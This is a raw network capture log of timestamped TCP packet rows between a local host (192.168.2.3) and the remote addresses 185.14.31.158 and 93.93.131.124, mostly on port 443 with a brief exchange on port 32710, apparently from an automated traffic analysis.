Jan 30, 2022 13:43:18.175201893 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.175236940 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.175648928 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.175708055 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.175734043 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.175748110 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.175765991 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.175782919 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.175806999 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.218533993 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.218605995 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.218646049 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.218691111 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.218713045 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.218744040 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.219054937 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.219115973 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.219134092 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.219147921 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.219176054 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.219196081 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.219655037 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.219731092 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.219784021 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.219827890 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.219841003 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.219892025 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.220336914 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.220396042 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.220416069 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.220426083 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.220467091 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.220487118 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.265074968 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.265176058 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.265201092 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.265229940 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.265250921 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.265305996 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.265521049 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.265598059 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.265630007 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.265642881 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.265683889 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.265724897 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.266161919 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.266222954 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.266241074 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.266294956 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.266307116 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.266355991 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.266401052 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.266654968 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.266746998 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.266779900 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.266789913 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.266843081 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.266890049 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.308624983 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.308774948 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.308820963 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.308888912 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.308912992 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.308939934 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.308957100 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309115887 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309159040 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309196949 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309210062 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309227943 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309254885 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309433937 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309469938 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309515953 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309528112 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309542894 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309580088 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309823036 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309891939 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309909105 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309921980 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.309938908 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.309962988 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.310481071 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.310523987 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.310575008 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.310589075 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.310606003 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.310631037 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.352973938 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353015900 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353074074 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353121996 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353141069 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353168964 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353328943 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353368998 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353408098 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353421926 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353446960 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353466988 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353698015 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353737116 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353799105 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353811026 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.353844881 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.353873014 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.354110956 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.354151011 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.354197025 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.354211092 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.354233980 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.354254961 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.396800995 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.396847010 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.396908045 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.396930933 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.396945000 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.396965027 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.396985054 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.396995068 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.397025108 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.397066116 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.397075891 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.397125006 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.397125006 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.397185087 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:29.828332901 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:45.191752911 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:45.191802979 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:45.672951937 CET	49835	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:45.696872950 CET	32710	49835	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:45.697031021 CET	49835	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:45.701220989 CET	49835	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:45.766330004 CET	32710	49835	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:45.976969957 CET	32710	49835	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:45.977138042 CET	49835	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:45.984807968 CET	49835	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:46.008399963 CET	32710	49835	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:46.031913042 CET	49836	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.031999111 CET	443	49836	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.032124996 CET	49836	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.032421112 CET	49836	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.032491922 CET	443	49836	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.032562017 CET	49836	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.044926882 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.044995070 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.045085907 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.045648098 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.045677900 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.155668974 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.155808926 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.165714979 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.165730953 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.166033983 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.166096926 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.166698933 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.203507900 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.203622103 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.203639984 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.203733921 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.205363035 CET	49837	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.205395937 CET	443	49837	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.305531025 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.305608988 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.305730104 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.306580067 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.306613922 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.388148069 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.388348103 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.388891935 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.388911963 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.393249035 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.393282890 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.450141907 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.450190067 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.450299978 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.450340986 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.450368881 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.450418949 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.480705976 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.480837107 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.480901957 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.480950117 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.480974913 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.481007099 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.481177092 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.481266975 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.512037039 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.512150049 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.512200117 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.512244940 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.512268066 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.512293100 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.512423992 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.512504101 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.512876987 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.512955904 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.513320923 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.513396025 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.513776064 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.513859034 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.514189005 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.514265060 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.543406010 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.543521881 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.543529987 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.543576002 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.543602943 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.543632030 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.543770075 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.543859005 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.543941975 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.544023037 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.544156075 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.544233084 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.544337034 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.544425011 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.544573069 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.544647932 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.544822931 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.544900894 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.545036077 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.545110941 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.545229912 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.545308113 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.545414925 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.545490026 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.545610905 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.545696020 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.577105999 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.577203035 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.577240944 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.577323914 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.577352047 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.577431917 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.577594042 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.577672958 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.577807903 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.577883959 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.578053951 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.578126907 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.578227997 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.578305960 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.578427076 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.578505993 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.578617096 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.578705072 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.578780890 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.578861952 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.579031944 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.579109907 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.579206944 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.579283953 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.579405069 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.579488993 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.579653025 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.579746962 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.579859972 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.579942942 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.580055952 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.580137014 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.580251932 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.580336094 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.580450058 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.580540895 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.580646038 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.580723047 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.580838919 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.580919981 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.581031084 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.581110001 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.581224918 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.581304073 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.581419945 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.581496954 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.581625938 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.581712008 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.581815958 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.581892014 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.613182068 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.613337994 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.613358021 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.613404989 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.613430023 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.613471031 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.613532066 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.613614082 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.613724947 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.613809109 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.613912106 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.613993883 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.614113092 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.614192963 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.614320040 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.614406109 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.614499092 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.614583969 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.614672899 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.614749908 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.614970922 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.615042925 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.615164995 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.615242958 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.615339994 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.615420103 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.615539074 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.615619898 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.615725040 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.615813017 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.615889072 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.615977049 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.616091013 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.616168022 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.616269112 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.616350889 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.616440058 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.616529942 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.616687059 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.616765022 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.616884947 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.616966963 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.617072105 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.617153883 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.617269039 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.617348909 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.617492914 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.617573977 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.617698908 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.617774963 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.617913961 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.617997885 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.618103027 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.618192911 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.618316889 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.618398905 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.618483067 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.618561983 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.618670940 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.618747950 CET	49838	443	192.168.2.3	93.93.131.124
